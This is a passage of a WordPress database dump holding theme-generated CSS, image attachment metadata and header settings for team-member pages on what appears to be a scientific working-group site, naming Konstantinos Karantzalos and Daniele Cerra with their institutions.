background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(28152,3863,'_edit_lock','1675725782:1'),
(28153,3864,'_wp_attached_file','2023/02/ws281.jpg'),
(28154,3864,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:128;s:6:\"height\";i:129;s:4:\"file\";s:17:\"2023/02/ws281.jpg\";s:8:\"filesize\";i:6325;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(28155,3863,'_thumbnail_id','3864'),
(28156,3863,'_edit_last','1'),
(28157,3863,'_dt_sidebar_position','disabled'),
(28158,3863,'_dt_sidebar_widgetarea_id','sidebar_1'),
(28159,3863,'_dt_sidebar_hide_on_mobile','0'),
(28160,3863,'_dt_footer_show','1'),
(28161,3863,'_dt_footer_widgetarea_id','sidebar_2'),
(28162,3863,'_dt_footer_hide_on_mobile','0'),
(28163,3863,'_dt_header_title','fancy'),
(28164,3863,'_dt_header_background','normal'),
(28165,3863,'_dt_header_background_below_slideshow','disabled'),
(28166,3863,'_dt_header_transparent_bg_color_scheme','light'),
(28167,3863,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(28168,3863,'_dt_header_transparent_top_bar_bg_opacity','25'),
(28169,3863,'_dt_header_transparent_bg_color','#000000'),
(28170,3863,'_dt_header_transparent_bg_opacity','50'),
(28171,3863,'_dt_header_disabled_background','normal'),
(28172,3863,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(28173,3863,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(28174,3863,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(28175,3863,'_dt_header_disabled_transparent_bg_color','#000000'),
(28176,3863,'_dt_header_disabled_transparent_bg_opacity','50'),
(28177,3863,'_dt_page_overrides_top_margin',''),
(28178,3863,'_dt_page_overrides_right_margin',''),
(28179,3863,'_dt_page_overrides_bottom_margin',''),
(28180,3863,'_dt_page_overrides_left_margin',''),
(28181,3863,'_dt_mobile_page_padding_top',''),
(28182,3863,'_dt_mobile_page_padding_right',''),
(28183,3863,'_dt_mobile_page_padding_bottom',''),
(28184,3863,'_dt_mobile_page_padding_left',''),
(28185,3863,'_dt_fancy_header_layout_heading',''),
(28186,3863,'_dt_fancy_header_title_aligment','center'),
(28187,3863,'_dt_fancy_header_height','300'),
(28188,3863,'_dt_fancy_header_padding-top','0px'),
(28189,3863,'_dt_fancy_header_padding-bottom','0px'),
(28190,3863,'_dt_fancy_header_breadcrumbs_heading',''),
(28191,3863,'_dt_fancy_header_breadcrumbs','disabled'),
(28192,3863,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(28193,3863,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(28194,3863,'_dt_fancy_header_title_heading',''),
(28195,3863,'_dt_fancy_header_title_mode','custom'),
(28196,3863,'_dt_fancy_header_title','Konstantinos Karantzalos'),
(28197,3863,'_dt_fancy_header_title_font_size','30'),
(28198,3863,'_dt_fancy_header_title_line_height','36'),
(28199,3863,'_dt_fancy_header_text_transform','none'),
(28200,3863,'_dt_fancy_header_title_color_mode','color'),
(28201,3863,'_dt_fancy_header_title_color','#ffffff'),
(28202,3863,'_dt_fancy_header_subtitle_heading',''),
(28203,3863,'_dt_fancy_header_subtitle','National Technical University of Athens, Greece (WG III/2)'),
(28204,3863,'_dt_fancy_header_subtitle_font_size','18'),
(28205,3863,'_dt_fancy_header_subtitle_line_height','26'),
(28206,3863,'_dt_fancy_header_subtitle_text_transform','none'),
(28207,3863,'_dt_fancy_header_subtitle_color_mode','color'),
(28208,3863,'_dt_fancy_header_subtitle_color','#ffffff'),
(28209,3863,'_dt_fancy_header_bg_heading',''),
(28210,3863,'_dt_fancy_header_bg_color','#222222'),
(28211,3863,'_dt_fancy_header_bg_image_origin','custom'),
(28212,3863,'_dt_fancy_header_bg_image','a:0:{}'),
(28213,3863,'_dt_fancy_header_bg_repeat','no-repeat'),
(28214,3863,'_dt_fancy_header_bg_position_x','center'),
(28215,3863,'_dt_fancy_header_bg_position_y','center'),
(28216,3863,'_dt_fancy_header_bg_fullscreen','1'),
(28217,3863,'_dt_fancy_header_bg_overlay','0'),
(28218,3863,'_dt_fancy_header_overlay_color','#000'),
(28219,3863,'_dt_fancy_header_bg_overlay_opacity','50'),
(28220,3863,'_dt_fancy_header_scroll_effect','default'),
(28221,3863,'_dt_fancy_header_bg_parallax','0.5'),
(28222,3863,'_dt_fancy_header_responsiveness_heading',''),
(28223,3863,'_dt_fancy_header_responsiveness','disabled'),
(28224,3863,'_dt_fancy_header_responsiveness_switch','778px'),
(28225,3863,'_dt_fancy_header_responsive_height','70'),
(28226,3863,'_dt_fancy_header_responsive_font_size','30'),
(28227,3863,'_dt_fancy_header_responsive_title_line_height','38'),
(28228,3863,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(28229,3863,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(28230,3863,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(28231,3863,'_dt_teammate_options_go_to_single','1'),
(28232,3863,'_dt_teammate_options_position',''),
(28233,3863,'_dt_teammate_options_website',''),
(28234,3863,'_dt_teammate_options_mail',''),
(28235,3863,'_dt_teammate_options_facebook',''),
(28236,3863,'_dt_teammate_options_twitter',''),
(28237,3863,'_dt_teammate_options_dribbble',''),
(28238,3863,'_dt_teammate_options_you-tube',''),
(28239,3863,'_dt_teammate_options_rss',''),
(28240,3863,'_dt_teammate_options_delicious',''),
(28241,3863,'_dt_teammate_options_flickr',''),
(28242,3863,'_dt_teammate_options_lastfm',''),
(28243,3863,'_dt_teammate_options_linkedin',''),
(28244,3863,'_dt_teammate_options_vimeo',''),
(28245,3863,'_dt_teammate_options_tumbler',''),
(28246,3863,'_dt_teammate_options_pinterest',''),
(28247,3863,'_dt_teammate_options_devian',''),
(28248,3863,'_dt_teammate_options_skype',''),
(28249,3863,'_dt_teammate_options_github',''),
(28250,3863,'_dt_teammate_options_instagram',''),
(28251,3863,'_dt_teammate_options_stumbleupon',''),
(28252,3863,'_dt_teammate_options_behance',''),
(28253,3863,'_dt_teammate_options_px-500',''),
(28254,3863,'_dt_teammate_options_tripedvisor',''),
(28255,3863,'_dt_teammate_options_vk',''),
(28256,3863,'_dt_teammate_options_foursquare',''),
(28257,3863,'_dt_teammate_options_xing',''),
(28258,3863,'_dt_teammate_options_weibo',''),
(28259,3863,'_dt_teammate_options_odnoklassniki',''),
(28260,3863,'_dt_teammate_options_research-gate',''),
(28261,3863,'_dt_teammate_options_yelp',''),
(28262,3863,'_dt_teammate_options_blogger',''),
(28263,3863,'_dt_teammate_options_soundcloud',''),
(28264,3863,'_dt_teammate_options_viber',''),
(28265,3863,'_dt_teammate_options_whatsapp',''),
(28266,3863,'_dt_teammate_options_reddit',''),
(28267,3863,'_dt_teammate_options_snapchat',''),
(28268,3863,'_dt_teammate_options_telegram',''),
(28269,3863,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(28270,3865,'_edit_lock','1675725954:1'),
(28271,3866,'_wp_attached_file','2023/02/ws282.jpg'),
(28272,3866,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:136;s:6:\"height\";i:140;s:4:\"file\";s:17:\"2023/02/ws282.jpg\";s:8:\"filesize\";i:5771;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(28273,3865,'_thumbnail_id','3866'),
(28274,3865,'_edit_last','1'),
(28275,3865,'_dt_sidebar_position','disabled'),
(28276,3865,'_dt_sidebar_widgetarea_id','sidebar_1'),
(28277,3865,'_dt_sidebar_hide_on_mobile','0'),
(28278,3865,'_dt_footer_show','1'),
(28279,3865,'_dt_footer_widgetarea_id','sidebar_2'),
(28280,3865,'_dt_footer_hide_on_mobile','0'),
(28281,3865,'_dt_header_title','fancy'),
(28282,3865,'_dt_header_background','normal'),
(28283,3865,'_dt_header_background_below_slideshow','disabled'),
(28284,3865,'_dt_header_transparent_bg_color_scheme','light'),
(28285,3865,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(28286,3865,'_dt_header_transparent_top_bar_bg_opacity','25'),
(28287,3865,'_dt_header_transparent_bg_color','#000000'),
(28288,3865,'_dt_header_transparent_bg_opacity','50'),
(28289,3865,'_dt_header_disabled_background','normal'),
(28290,3865,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(28291,3865,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(28292,3865,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(28293,3865,'_dt_header_disabled_transparent_bg_color','#000000'),
(28294,3865,'_dt_header_disabled_transparent_bg_opacity','50'),
(28295,3865,'_dt_page_overrides_top_margin',''),
(28296,3865,'_dt_page_overrides_right_margin',''),
(28297,3865,'_dt_page_overrides_bottom_margin',''),
(28298,3865,'_dt_page_overrides_left_margin',''),
(28299,3865,'_dt_mobile_page_padding_top',''),
(28300,3865,'_dt_mobile_page_padding_right',''),
(28301,3865,'_dt_mobile_page_padding_bottom',''),
(28302,3865,'_dt_mobile_page_padding_left',''),
(28303,3865,'_dt_fancy_header_layout_heading',''),
(28304,3865,'_dt_fancy_header_title_aligment','center'),
(28305,3865,'_dt_fancy_header_height','300'),
(28306,3865,'_dt_fancy_header_padding-top','0px'),
(28307,3865,'_dt_fancy_header_padding-bottom','0px'),
(28308,3865,'_dt_fancy_header_breadcrumbs_heading',''),
(28309,3865,'_dt_fancy_header_breadcrumbs','disabled'),
(28310,3865,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(28311,3865,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(28312,3865,'_dt_fancy_header_title_heading',''),
(28313,3865,'_dt_fancy_header_title_mode','custom'),
(28314,3865,'_dt_fancy_header_title','Daniele Cerra'),
(28315,3865,'_dt_fancy_header_title_font_size','30'),
(28316,3865,'_dt_fancy_header_title_line_height','36'),
(28317,3865,'_dt_fancy_header_text_transform','none'),
(28318,3865,'_dt_fancy_header_title_color_mode','color'),
(28319,3865,'_dt_fancy_header_title_color','#ffffff'),
(28320,3865,'_dt_fancy_header_subtitle_heading',''),
(28321,3865,'_dt_fancy_header_subtitle','German Aerospace Center, Germany (WG I/3)'),
(28322,3865,'_dt_fancy_header_subtitle_font_size','18'),
(28323,3865,'_dt_fancy_header_subtitle_line_height','26'),
(28324,3865,'_dt_fancy_header_subtitle_text_transform','none'),
(28325,3865,'_dt_fancy_header_subtitle_color_mode','color'),
(28326,3865,'_dt_fancy_header_subtitle_color','#ffffff'),
(28327,3865,'_dt_fancy_header_bg_heading',''),
(28328,3865,'_dt_fancy_header_bg_color','#222222'),
(28329,3865,'_dt_fancy_header_bg_image_origin','custom'),
(28330,3865,'_dt_fancy_header_bg_image','a:0:{}'),
(28331,3865,'_dt_fancy_header_bg_repeat','no-repeat'),
(28332,3865,'_dt_fancy_header_bg_position_x','center'),
(28333,3865,'_dt_fancy_header_bg_position_y','center'),
(28334,3865,'_dt_fancy_header_bg_fullscreen','1'),
(28335,3865,'_dt_fancy_header_bg_overlay','0'),
(28336,3865,'_dt_fancy_header_overlay_color','#000'),
(28337,3865,'_dt_fancy_header_bg_overlay_opacity','50'),
(28338,3865,'_dt_fancy_header_scroll_effect','default'),
(28339,3865,'_dt_fancy_header_bg_parallax','0.5'),
(28340,3865,'_dt_fancy_header_responsiveness_heading',''),
(28341,3865,'_dt_fancy_header_responsiveness','disabled'),
(28342,3865,'_dt_fancy_header_responsiveness_switch','778px'),
(28343,3865,'_dt_fancy_header_responsive_height','70'),
(28344,3865,'_dt_fancy_header_responsive_font_size','30'),
(28345,3865,'_dt_fancy_header_responsive_title_line_height','38'),
(28346,3865,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(28347,3865,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(28348,3865,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(28349,3865,'_dt_teammate_options_go_to_single','1'),
(28350,3865,'_dt_teammate_options_position',''),
(28351,3865,'_dt_teammate_options_website',''),
(28352,3865,'_dt_teammate_options_mail',''),
(28353,3865,'_dt_teammate_options_facebook',''),
(28354,3865,'_dt_teammate_options_twitter',''),
(28355,3865,'_dt_teammate_options_dribbble',''),
(28356,3865,'_dt_teammate_options_you-tube',''),
(28357,3865,'_dt_teammate_options_rss',''),
